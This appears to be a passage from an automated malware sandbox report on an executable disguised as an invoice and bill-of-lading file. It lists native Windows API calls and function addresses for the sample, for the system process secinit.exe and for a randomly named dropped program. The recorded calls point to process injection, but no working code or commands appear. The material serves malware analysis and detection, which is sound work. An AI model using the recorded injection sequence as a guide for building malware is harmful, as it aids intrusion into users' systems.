                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672FE0 NtCreateFile,3_2_01672FE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672FA0 NtQuerySection,3_2_01672FA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672FB0 NtResumeThread,3_2_01672FB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672F90 NtProtectVirtualMemory,3_2_01672F90
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672E30 NtWriteVirtualMemory,3_2_01672E30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672EE0 NtQueueApcThread,3_2_01672EE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672EA0 NtAdjustPrivilegesToken,3_2_01672EA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672E80 NtReadVirtualMemory,3_2_01672E80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01673010 NtOpenDirectoryObject,3_2_01673010
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01673090 NtSetValueKey,3_2_01673090
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_016739B0 NtGetContextThread,3_2_016739B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01673D70 NtOpenThread,3_2_01673D70
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01673D10 NtOpenProcessToken,3_2_01673D10
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03284340 NtSetContextThread,LdrInitializeThunk,6_2_03284340
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03284650 NtSuspendThread,LdrInitializeThunk,6_2_03284650
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282B60 NtClose,LdrInitializeThunk,6_2_03282B60
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03282BA0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03282BE0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03282BF0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282AF0 NtWriteFile,LdrInitializeThunk,6_2_03282AF0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282AD0 NtReadFile,LdrInitializeThunk,6_2_03282AD0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282F30 NtCreateSection,LdrInitializeThunk,6_2_03282F30
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282FB0 NtResumeThread,LdrInitializeThunk,6_2_03282FB0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282FE0 NtCreateFile,LdrInitializeThunk,6_2_03282FE0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03282E80
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03282EE0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03282D30
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03282D10
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03282DF0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282DD0 NtDelayExecution,LdrInitializeThunk,6_2_03282DD0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282C60 NtCreateKey,LdrInitializeThunk,6_2_03282C60
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03282C70
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03282CA0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_032835C0 NtCreateMutant,LdrInitializeThunk,6_2_032835C0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_032839B0 NtGetContextThread,LdrInitializeThunk,6_2_032839B0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282B80 NtQueryInformationFile,6_2_03282B80
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282AB0 NtWaitForSingleObject,6_2_03282AB0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282F60 NtCreateProcessEx,6_2_03282F60
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282FA0 NtQuerySection,6_2_03282FA0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282F90 NtProtectVirtualMemory,6_2_03282F90
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282E30 NtWriteVirtualMemory,6_2_03282E30
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282EA0 NtAdjustPrivilegesToken,6_2_03282EA0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282D00 NtSetInformationFile,6_2_03282D00
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282DB0 NtEnumerateKey,6_2_03282DB0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282C00 NtQueryInformationProcess,6_2_03282C00
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282CF0 NtOpenProcess,6_2_03282CF0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03282CC0 NtQueryVirtualMemory,6_2_03282CC0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03283010 NtOpenDirectoryObject,6_2_03283010
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03283090 NtSetValueKey,6_2_03283090
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03283D10 NtOpenProcessToken,6_2_03283D10
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_03283D70 NtOpenThread,6_2_03283D70
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_02AE9240 NtCreateFile,6_2_02AE9240
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_02AE93A0 NtReadFile,6_2_02AE93A0
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_02AE9690 NtAllocateVirtualMemory,6_2_02AE9690
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_02AE9490 NtDeleteFile,6_2_02AE9490
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_02AE9530 NtClose,6_2_02AE9530
                Source: C:\Windows\SysWOW64\secinit.exe Code function: 6_2_0356F980 NtSetContextThread,6_2_0356F980
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F41A23_2_016F41A2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017001AA3_2_017001AA
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D20003_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FA3523_2_016FA352
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E3F03_2_0164E3F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017003E63_2_017003E6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E02743_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C02C03_2_016C02C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016405353_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017005913_2_01700591
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F24463_2_016F2446
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E44203_2_016E4420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EE4F63_2_016EE4F6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016407703_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016647503_2_01664750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163C7C03_2_0163C7C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165C6E03_2_0165C6E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016569623_2_01656962
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A03_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170A9A63_2_0170A9A6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164A8403_2_0164A840
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016428403_2_01642840
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E8F03_2_0166E8F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016268B83_2_016268B8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FAB403_2_016FAB40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F6BD73_2_016F6BD7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163EA803_2_0163EA80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164AD003_2_0164AD00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DCD1F3_2_016DCD1F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163ADE03_2_0163ADE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01658DBF3_2_01658DBF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640C003_2_01640C00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630CF23_2_01630CF2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0CB53_2_016E0CB5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B4F403_2_016B4F40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01682F283_2_01682F28
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01660F303_2_01660F30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E2F303_2_016E2F30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164CFE03_2_0164CFE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632FC83_2_01632FC8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BEFA03_2_016BEFA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640E593_2_01640E59
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FEE263_2_016FEE26
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FEEDB3_2_016FEEDB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652E903_2_01652E90
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FCE933_2_016FCE93
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167516C3_2_0167516C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162F1723_2_0162F172
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170B16B3_2_0170B16B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164B1B03_2_0164B1B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F70E93_2_016F70E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FF0E03_2_016FF0E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EF0CC3_2_016EF0CC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016470C03_2_016470C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162D34C3_2_0162D34C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F132D3_2_016F132D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0168739A3_2_0168739A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E12ED3_2_016E12ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165B2C03_2_0165B2C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016452A03_2_016452A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F75713_2_016F7571
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017095C33_2_017095C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DD5B03_2_016DD5B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016314603_2_01631460
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FF43F3_2_016FF43F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FF7B03_2_016FF7B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016856303_2_01685630
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F16CC3_2_016F16CC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016499503_2_01649950
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165B9503_2_0165B950
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D59103_2_016D5910
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AD8003_2_016AD800
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016438E03_2_016438E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFB763_2_016FFB76
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B5BF03_2_016B5BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167DBF93_2_0167DBF9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165FB803_2_0165FB80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B3A6C3_2_016B3A6C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFA493_2_016FFA49
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F7A463_2_016F7A46
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EDAC63_2_016EDAC6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DDAAC3_2_016DDAAC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01685AA03_2_01685AA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E1AA33_2_016E1AA3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F7D733_2_016F7D73
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01643D403_2_01643D40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F1D5A3_2_016F1D5A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165FDC03_2_0165FDC0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B9C323_2_016B9C32
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFCF23_2_016FFCF2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFF093_2_016FFF09
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01603FD23_2_01603FD2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01603FD53_2_01603FD5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFFB13_2_016FFFB1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01641F923_2_01641F92
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01649EB03_2_01649EB0
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB248D5_2_04FB248D
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB24435_2_04FB2443
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB24445_2_04FB2444
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FD2F245_2_04FD2F24
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB40E45_2_04FB40E4
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB40DB5_2_04FB40DB
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBC8945_2_04FBC894
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB22F45_2_04FB22F4
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBAA945_2_04FBAA94
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBAA8F5_2_04FBAA8F
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB43045_2_04FB4304
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330A3526_2_0330A352
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325E3F06_2_0325E3F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033103E66_2_033103E6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F02746_2_032F0274
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032D02C06_2_032D02C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032401006_2_03240100
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032EA1186_2_032EA118
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032D81586_2_032D8158
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033041A26_2_033041A2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033101AA6_2_033101AA
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033081CC6_2_033081CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032E20006_2_032E2000
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032507706_2_03250770
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032747506_2_03274750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0324C7C06_2_0324C7C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326C6E06_2_0326C6E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032505356_2_03250535
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033105916_2_03310591
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F44206_2_032F4420
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033024466_2_03302446
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032FE4F66_2_032FE4F6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330AB406_2_0330AB40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03306BD76_2_03306BD7
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0324EA806_2_0324EA80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032669626_2_03266962
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032529A06_2_032529A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0331A9A66_2_0331A9A6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032528406_2_03252840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325A8406_2_0325A840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032368B86_2_032368B8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0327E8F06_2_0327E8F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03292F286_2_03292F28
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03270F306_2_03270F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F2F306_2_032F2F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C4F406_2_032C4F40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032CEFA06_2_032CEFA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325CFE06_2_0325CFE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03242FC86_2_03242FC8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330EE266_2_0330EE26
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03250E596_2_03250E59
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330CE936_2_0330CE93
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03262E906_2_03262E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330EEDB6_2_0330EEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325AD006_2_0325AD00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032ECD1F6_2_032ECD1F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03268DBF6_2_03268DBF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0324ADE06_2_0324ADE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03250C006_2_03250C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F0CB56_2_032F0CB5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03240CF26_2_03240CF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330132D6_2_0330132D
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0323D34C6_2_0323D34C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0329739A6_2_0329739A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032552A06_2_032552A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F12ED6_2_032F12ED
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326B2C06_2_0326B2C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0328516C6_2_0328516C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0323F1726_2_0323F172
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0331B16B6_2_0331B16B
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325B1B06_2_0325B1B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330F0E06_2_0330F0E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033070E96_2_033070E9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032FF0CC6_2_032FF0CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032570C06_2_032570C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330F7B06_2_0330F7B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032956306_2_03295630
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033016CC6_2_033016CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033075716_2_03307571
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032ED5B06_2_032ED5B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033195C36_2_033195C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330F43F6_2_0330F43F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032414606_2_03241460
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FB766_2_0330FB76
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326FB806_2_0326FB80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0328DBF96_2_0328DBF9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C5BF06_2_032C5BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C3A6C6_2_032C3A6C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03307A466_2_03307A46
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FA496_2_0330FA49
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032EDAAC6_2_032EDAAC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03295AA06_2_03295AA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F1AA36_2_032F1AA3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032FDAC66_2_032FDAC6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032E59106_2_032E5910
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032599506_2_03259950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326B9506_2_0326B950
